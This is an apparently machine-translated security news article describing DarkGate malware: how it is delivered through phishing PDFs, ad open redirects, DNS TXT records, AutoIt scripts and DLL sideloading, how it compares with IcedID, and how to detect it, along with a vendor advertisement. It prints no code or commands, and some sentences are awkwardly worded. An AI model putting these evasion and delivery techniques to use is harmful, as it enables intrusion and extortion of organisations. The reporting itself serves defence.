After the removal of Qakbot, distribution of the DarkGate loader increased rapidly and was used by financially motivated attackers such as TA577 and ransomware groups (BianLian, Black Basta) to target financial institutions (US, Europe) for secondary attacks. Serious blackmail was carried out.
Establish an initial foothold, deploy information theft tools, ransomware, remote access tools, and leverage legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution to maximize profits from data theft and extortion. will become.
Similarities to the IcedID delivery method suggest that the threat actors may be collaborating or sharing their techniques.
Trustifi's advanced threat protection stops a wide range of advanced attacks before they reach users' mailboxes. Try Trustifi's free threat scan with advanced AI-powered email protection.
DarkGate is a malware-as-a-service advertised in June 2023 that uses multiple evasion techniques such as custom crypters, polymorphism, and anti-VM to provide remote access, data theft, and privilege escalation.
It also leverages the LOLBAS tool to download a malicious AutoIt script that decrypts the DarkGate payload and injects it into the process, establishing persistence through registry keys and rootkit modules.
Attackers primarily target financial institutions such as BDK, a large German bank, using phishing emails containing decoys related to the targeted industry and delivering DarkGate payloads through embedded links in PDF attachments.
This link redirects the victim to a download page hosted on the compromised website.
To evade detection, DarkGate operators employ innovative techniques, including abusing DNS TXT records to run malicious Windows commands that download and install malware.
EclecticIQ analysts compared DarkGate and IcedID malware and noted common tactics such as obfuscated strings, checking internet connectivity using PING.exe, downloading payload using CURL.exe, and decoy PDF documents. discovered.
They differ in executable tool (DarkGate: Cscript.exe, IcedID: Rundll32.exe) and payload type (DarkGate: VBS script, IcedID: Impersonation DLL).
In the DarkGate distribution, the attackers exploited open redirects in Google's DoubleClick ads using emails containing links disguised as invoices.
Since January 2024, DarkGate has migrated to CAB and MSI formats, potentially evading detection.
DarkGate version 6.1.6 employs DLL sideloading for evasion, where malicious DLLs are loaded into legitimate applications (VLC, iTunesHelper, etc.) through a compromised MSI installer.
The payload then decrypts itself using the key in the fake sqlite3.dll and drops the script to C:\temp. At the same time, it decrypts again using another key to launch the final DarkGate payload.
This version also features a new configuration decryption routine that uses XOR encryption to hide C2 server information and other operational parameters, making signature-based detection more difficult.
After gaining an initial foothold, DarkGate is a malware-as-a-service (MaaS) that steals information from victims' devices, including usernames, CPU information, and antivirus information.
Then run the VBS script using Living Off the Land Binaries (LOLBAS) such as wscript.exe and cscript.exe.
You can use network traffic analysis to detect suspicious patterns, such as downloads from unusual domains or suspicious Curl.exe activity. YARA rules can also be used to detect the final payload on infected devices.
The IOC contains a suspicious user agent string, a command and control (C2) server domain, a payload downloader URL containing a malicious zip file, and multiple file hashes to help identify infected systems, identify malicious It can be used to block certain traffic and improve threat detection.
Stay up to date with cybersecurity news, whitepapers, and infographics. Follow us on LinkedIn. twitter.